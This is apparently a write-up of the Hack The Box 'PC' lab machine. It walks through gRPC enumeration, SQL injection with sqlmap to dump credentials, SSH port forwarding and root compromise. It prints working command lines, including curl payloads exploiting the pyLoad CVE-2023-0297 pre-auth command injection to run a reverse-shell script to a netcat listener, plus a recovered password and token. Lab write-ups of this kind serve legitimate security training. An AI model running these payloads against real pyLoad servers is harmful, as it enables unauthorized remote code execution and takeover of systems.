Hack The Box PC Walkthrough

First connect to HTB using openvpn

2.

Then we will run a nmap scan nmap -sC -sV -Pn -p 22,50051 10.10.11.214

3.

-Pn: Treat all hosts as online -- skip host discovery

-sC: equivalent to --script=default

-sV: Probe open ports to determine service/version info

We see on port 50051 that GRPC is running on that port and ssh is crently being ran on that host machine

We then search for grpc tools in github and use git clone

5.

grpcui is a command-line tool that lets you interact with gRPC servers via a browser. It's sort of like Postman, but for gRPC APIs instead of REST.

6.

Mkdir grpcui

Cd grpcui

8.

Mv ~/Downloads/grpcui_1.3.1_linux_x86_64.tar.gz

9.

Tar xvf grpcui_1.3.1_linux_x86_64.tar.gz

10.

11.

We will then run the tool

$ grpcui -plaintext 10.10.11.214:50051

gRPC Web UI available at http://127.0.0.1:60551/…

12.

Then we will open burpsuite and paste in target scope settings http://127.0.0.1:44173/

13.

Intercept on

14.

Try admin password on the site time 222 invoke

15.

Copy token eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYWRtaW4iLCJleHAiOjE2ODc4NTM3MDJ9.QMhrmgZ4BwUJUAnegz0QTGOMTDTn3OED6riLCdDJJxI

16.

Get info request
Intercept in burpsuite
and then send to repeate

17.

Save to sqlmap folder in burpsuite on kali home directory /kali/home/sqlmap/sqlmap.req

18.

Sqlmap -r sqlmap/sqlmap.req --batch -D SQLite --tables

19.

Sqlmap -r sqlmap/sqlmap.req --batch -D SQLite --dump-all

20.

Forward

21.

Pass :HereIsYourPassWord1431

22.

Ssh sau@10.10.11.214
Ls -lah user.txt
Curl -I -L 127.0.0.1:8000

23.

Netstat -tlnp

24.

Ssh sau@10.10.11.214 -L 8000:127.0.0.1:8000

25.

http://localhost:8000/

26.

Search what is pyload

27.

Look up pyload exploit

28.

Github https://github.com/bAuh0lz/CVE-2023-0297_Pre-auth_RCE_in_pyLoad

29.

Ps -u root | grep pyload

30.

Cd /dev/shm on the PC machine
Nano rev.sh
Chmod +x rev.sh

31.

Nc -lvnp 9001

32.

We then use exploit pyload

curl -i -s -k -X $'POST' \

--data-binary $'jk=pyimport%20os;os.system(\"touch%20/tmp/pwnd\");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' \

$'http://localhost:8000/flash/addcrypted2'

Correct payload :

$ curl -i -s -k -X $'POST' \

--data-binary $'jk=pyimport%20os;os.system(\"bash%20/dev/shm/rev.sh\");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' \

$'http://localhost:8000/flash/addcrypted2'

33.

Cd /root

34.

Look for flag

Lessons Learned

The Hack The Box PC Challenge taught me valuable lessons that I will carry forward in my cybersecurity journey. Firstly, I learned the significance of thorough reconnaissance, which is always important when approaching any hacking endeavor. Secondly, I realized the importance of researching new technologies and exploits to expand my knowledge and skill set. Thirdly, I discovered that not all techniques will work, highlighting the need for adaptability and persistence. Despite the box being categorized as easy, it still required time and effort to navigate and find the right method to exploit it. These lessons have reinforced the importance of continuous learning and the need to approach challenges with a methodical mindset.